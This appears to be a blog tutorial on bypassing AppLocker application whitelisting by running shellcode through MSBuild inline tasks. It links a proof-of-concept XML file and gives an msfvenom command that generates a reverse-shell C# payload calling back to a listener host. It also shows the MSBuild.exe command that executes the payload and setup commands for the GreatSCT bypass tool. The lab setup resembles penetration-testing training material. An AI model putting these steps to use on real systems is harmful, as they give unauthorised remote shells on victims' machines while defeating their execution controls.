This is how to bypass application whitelisting with MSBuild. Casey Smith posted a POC in September 2016 for a malicious use for a Microsoft-signed binary named MSBuild.exe and how it could be used to execute shellcode embedded in an .xml file. MSBuild can execute something called inline tasks which are C# snippets that can be used to enhance the build process.
Wanna learn buffer overflow exploitation? It’s hard…luckily I found the perfect tool read about it here.
MSBuild’s original intention is to allow developers to execute C# projects without using VisualStudio. Naturally Microsoft has gotten a lot better at security over time, so what do modern hostile actors focus on to carry out exploits these days? They increasingly rely on application whitelisting bypasses. That means “living off the land” in other words using Microsoft’s already installed tools in order to execute malicious code.
What is AppLocker? AppLocker can be used to define user account and application specific process execution rules. MSBuild and other legitimate Microsoft-signed binaries can be used to bypass this defense mechanism.
Table of Contents
Here’s What You Need
- Kali Linux Virtual Machine (VirtualBox)
- Windows Client (VirtualBox)
- POC XML File
- GreatSCT( Great Scott ) Github Repository
Administer AppLocker using Group Policy
You must have Edit Setting permission to edit a GPO. By default, members of the Domain Admins group, the Enterprise Admins group, and the Group Policy Creator Owners group have this permission. Also, the Group Policy Management feature must be installed on the computer.
- Open the Group Policy Management Console (GPMC).
- Locate the GPO that contains the AppLocker policy to modify, right-click the GPO, and then click Edit.
- In the console tree, double-click Application Control Policies, double-click AppLocker, and then click the rule collection that you want to create the rule for.
Administer AppLocker on the local PC
- Click Start, type local security policy, and then click Local Security Policy.
- If the User Account Control dialog box appears, confirm that the action it displays is what you want, and then click Yes.
- In the console tree of the snap-in, double-click Application Control Policies, double-click AppLocker, and then click the rule collection that you want to create the rule for.
Method #1 : Manual
- Get the POC from https://gist.github.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17 and enter shellcode into it.
- Generate shellcode.
- Start Netcat listener
Generate the C# payload using msfvenom to create an unstaged payload that you will receive with a Netcat listener. The difference in unstaged and staged payloads? You must use msfconsole’s multi/handler to catch staged payloads while you can use Netcat to catch unstaged payloads.
msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=443 -f csharpThere is a conveniently labeled section of the POC xml file “replace with your C# code”, which you will do so.
To execute the payload we call MSBuild to run a new build on the xml file we crafted in the previous step.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe config.xmlThe build starts.
On the Kali Linux side a Netcat listener receives the shell.
Method #2: Using Automated Tools
Using GreatSCT
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
sudo ./setup.sh -c
python3 GreatSCT.pyThat’s it for the How to Bypass Application Whitelisting with MSBuild tutorial if you have questions or comments feel free to leave them at the end of the page!